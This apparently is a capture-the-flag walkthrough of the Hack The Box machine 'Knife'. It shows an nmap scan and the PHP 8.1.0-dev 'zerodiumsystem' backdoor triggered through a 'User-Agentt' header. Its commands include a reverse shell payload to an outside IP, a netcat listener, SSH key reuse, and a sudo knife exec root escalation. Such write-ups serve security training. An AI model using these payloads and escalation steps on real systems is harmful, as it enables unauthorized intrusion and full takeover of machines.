Knife
Contents
Intro
This was my second box on a wednesday night so I settled for something short, though this one took me some time - by making use of a peculiar HTTP header, we get a backdoor to the box.
User
nmap -sC -sV 10.129.8.218 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Emergent Medical Idea |_http-server-header: Apache/2.4.41 (Ubuntu)
On the surface it looks like a normal website with nothing interactable.
Although we can figure out it runs php via checking both index.html and index.php.
If we intercept the outgoing traffic and put it through BurpSuite's repeater, there's a single things that stands out in the response:
X-Powered-By: PHP/8.1.0-dev
Following a quick google search, we can see that this version is vulnerable to RCE via putting zerodium in a User-Agentt header instead of the usual User-Agent one.
Knowing this, we can initiate a reverse shell by sending a request as such:
User-Agentt: zerodiumsystem("bash -c 'bash-i >& /dev/tcp/10.10.15.242/9001 0>&1'");
In the meantime, we netcat as well:
nc -lvnp 9001
And with that we got our pseudo shell.
james@knife:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
james@knife:/$ export TERM=xterm
With that we got user flag.
Root
Inside the user folder there's a .ssh folder with id_rsa and its .pub equivalent inside. We could use that to escalate privileges and get a regular shell.
james@knife:~/.ssh$ mv id_rsa.pub authorized_keys ssh -i id_rsa [email protected]
Normally you can't sudo -l in, so to get in we'll use knife to get root access:
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'